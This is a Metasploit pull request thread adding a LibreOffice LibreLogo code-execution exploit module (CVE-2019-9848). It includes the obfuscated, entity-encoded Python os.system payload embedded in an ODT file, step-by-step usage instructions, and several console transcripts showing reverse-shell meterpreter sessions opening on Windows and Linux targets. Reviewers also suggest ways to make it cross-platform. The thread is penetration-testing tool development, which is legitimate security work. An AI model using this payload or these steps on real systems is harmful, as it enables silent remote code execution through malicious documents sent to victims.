Adds LibreOffice LibreLogo exec exploit Module (CVE-2019-9848)
rapid7/metasploit-framework pull request #12147
Opened 2019-07-30 21:46 UTC by LoadLow

Adds LibreOffice LibreLogo exec exploit Module (CVE-2019-9848). 
It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the odt file with a vulnerable LibreOffice (in comparison to the original PoC). 

[Original PoC from Nils Emmerich](https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/)

## Description

  This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 

  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 

  This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

  The generated document file contains a one-liner python code that does an os.system : 

  ```python
  getattr(__import__(“os”),“system”)(“<%= @cmd %>”)
  ```

  but encoded :

  ```xml
  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>
  ```

  To avoid any python error, the h1 title written in the document is a python comment `#`.

## Vulnerable Application

  "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
  4. Do: ```set LHOST <ip>```
  5. Do: ```set LPORT <port>```
  6. Do: ```run```
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
 10. You should get a shell.

## Scenarios

### Tested on LibreOffice 6.2.4 running Windows 7

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.33.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.33.102
  [*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

  meterpreter > 
  ```

### Tested on LibreOffice 6.2.4 running Debian 9.9

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

  [+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
  payload => linux/x86/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.33.1
  lhost => 192.168.33.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.33.1:4444 
  [*] Sending stage (985320 bytes) to 192.168.33.117
  [*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

  meterpreter > getuid
  Server username: uid=1001, gid=1001, euid=1001, egid=1001
  meterpreter > 
  ```

2019-08-02 03:48 UTC, cbrnrd requested changes
Awesome work! Just a few stylistic things to clean up, but looks good otherwise :)

2019-08-02 03:48 UTC, cbrnrd commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.
LibreOffice <= 6.2.5

2019-08-02 03:48 UTC, cbrnrd commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +      'DisclosureDate'  =>  "2019-07-16",
Are we still using the `Mon day year` format for `DisclosureDate`? If so, this should be changed to `Jul 16 2019`

2019-08-02 03:48 UTC, cbrnrd commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +      'DisclosureDate'  =>  "2019-07-16",
Also single quotes

2019-08-02 03:48 UTC, cbrnrd commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  The generated document file contains a one-liner python code that does an os.system :
```suggestion
  The generated document file contains a one-liner python code that calls `os.system`: 
```

2019-08-02 03:48 UTC, cbrnrd commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +    text_content = "My Report"
```suggestion
    text_content = 'My Report'
```

2019-08-02 03:48 UTC, cbrnrd commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +    file_create(fodt_file)
If a user doesn't read the info they might be confused as to what to do with the generated file. Maybe add a line or two (similar to what `web_delivery` does) about how to use it.

2019-08-02 03:48 UTC, cbrnrd commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +## Description
```suggestion
## Introduction
```

2019-08-02 03:48 UTC, cbrnrd commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +    text_content = "My Report"
This could also be made customizable by registering it as a datastore option.

2019-08-02 23:33 UTC, bcoles commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +      'DisclosureDate'  =>  "2019-07-16",
> 
> 
> Are we still using the `Mon day year` format for `DisclosureDate`? If so, this should be changed to `Jul 16 2019`

ISO date format is acceptable and objectively superior.

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +## Description
The documentation template does not indicate whether `Introduction` or `Description` is preferred. `Description` Is preferred for consistency.

```
root@kali-2018:~/Desktop/metasploit-framework# grep -rn "# Introduction" documentation/ | wc -l
22
root@kali-2018:~/Desktop/metasploit-framework# grep -rn "# Description" documentation/ | wc -l
255
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  getattr(__import__(“os”),“system”)(“<%= @cmd %>”)
```suggestion
  getattr(__import__("os"),"system")("<%= @cmd %>")
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;
```suggestion
  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)"<%= @cmd %>")</text:p>
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  To avoid any python error, the h1 title written in the document is a python comment `#`.
```suggestion
  To avoid any python error, the `h1` title written in the document is a python comment `#`.
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  "LibreOffice versions prior to 6.2.5", but, unfortunately, it seems to also work on 6.2.5.
```suggestion
  LibreOffice version 6.2.5 and prior.
```

Also, list the versions of LibreOffice with which the module was tested here. ie:

```
This module has been tested successfully with:

* LibreOffice 6.2.4 on Windows 7
* LibreOffice 6.2.4 on Debian 9.9
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +### Tested on LibreOffice 6.2.4 running Windows 7
```suggestion
### LibreOffice 6.2.4 on Windows 7
```

2019-08-02 23:33 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +### Tested on LibreOffice 6.2.4 running Debian 9.9
```suggestion
### Tested on LibreOffice 6.2.4 on Debian 9.9
```

2019-08-02 23:33 UTC, bcoles commented on modules/exploits/multi/fileformat/libreoffice_logo_exec.rb
> +    if datastore['TARGET'] == 0
Using string comparison (or regex match) for target selection is usually preferred over using the target index, as it's easier to read, and the target index could change with the addition of new targets.

```ruby
    if target.name == 'Windows'
      gen_windows_cmd
    elsif target.name == 'Linux'
      gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
```

2019-08-03 03:53 UTC, LoadLow commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  <text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;
This is not a typo error, the python interpreter accepts it

2019-08-03 04:23 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :
Smart quotes are the devil.

> because this interpreter accepts it

Disputable:

```
$ python
Python 2.7.15rc1 (default, Nov 12 2018, 14:31:15) 
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> print(“a”)
  File "<stdin>", line 1
    print(“a”)
          ^
SyntaxError: invalid syntax
>>> 
```

```
$ python3
Python 3.6.7 (default, Oct 22 2018, 11:32:17) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print(“a”)
  File "<stdin>", line 1
    print(“a”)
            ^
SyntaxError: invalid character in identifier
>>> 
```

> and why not?

Potential environment locale issues.

2019-08-03 04:26 UTC, bcoles commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :
I realised afterwards that you said `this interpreter`, rather than the Python interpreter. :shrug:

It looks like you've tested on a couple systems. Marking this as resolved.

2019-08-03 04:27 UTC, LoadLow commented on documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md
> +  but with smart quotes `“os”`(because this interpreter accepts it and why not?) and encoded :
Yes I was speaking about the way it handles the odt text part and interprets it in Python

2019-08-03 04:33 UTC, bcoles commented
Is there a reason to use `ARCH_CMD` payloads rather than `ARCH_PYTHON` ?

I ask, because this is a file format exploit, and there's no guarantee the user will open the document on the correct platform. Comparatively, if you're already executing native Python code, you could use a Python payload, which should effectively be universal, and execute regardless of the target platform.

2019-08-03 04:38 UTC, LoadLow commented
I have first tried it, but it was not working properly.
Maybe, it was related to some characters handled differently and because each line of Python must be in its `<text:p>` block.

2019-08-03 04:39 UTC, bcoles commented
> each line of Python must be in its `<text:p>` block.

Perhaps it could be wrapped in an `eval()` call ? Maybe whoever reviews this PR can take a look during the review process.

2019-08-03 04:42 UTC, LoadLow commented
I was trying with an `eval` payload but without any success, but yes it could be interesting to target all the platforms with only one document.

2019-08-03 05:00 UTC, bcoles commented
FWIW, I tested this on Linux Mint 19.

Initial exploitation failed, as the Libre Logo package was not installed by default.

![image](https://user-images.githubusercontent.com/434827/62407656-4c208b80-b5ff-11e9-82ad-6702ee82bfcc.png)

![image](https://user-images.githubusercontent.com/434827/62407654-49259b00-b5ff-11e9-9734-b535cb1945bd.png)

However, upon installation, the exploit worked as described:

```
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set disablepayloadhandler false
disablepayloadhandler => false
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /root/.msf4/local/librefile.odt
[*] Sending stage (3021284 bytes) to 172.16.191.211

[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.211:43966) at 2019-08-03 00:58:31 -0400

meterpreter > 
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
```

2019-08-13 18:14 UTC, space-r7 commented
Tested `v6.2.4` on Ubuntu:

```
msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set target 1
target => 1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:42962) at 2019-08-13 12:50:27 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.137
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

Tested `v6.2.5` on Windows 10:

```
msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (179779 bytes) to 192.168.37.147
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:50192) at 2019-08-13 13:12:59 -0500

meterpreter > getuid
Server username: DESKTOP-L5FDSM7\Shelby Pace
meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```

2019-08-13 18:24 UTC, space-r7 commented
Hi @LoadLow, I just noticed that you're working off of your `master` branch. Before I can land your module, could you create a new PR that is based off of a unique branch instead?

This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.

I'll go ahead and close this PR, and I'll be looking out for the new PR. Apologies for not catching this sooner. Thank you!

2019-08-13 18:24 UTC, closed without merging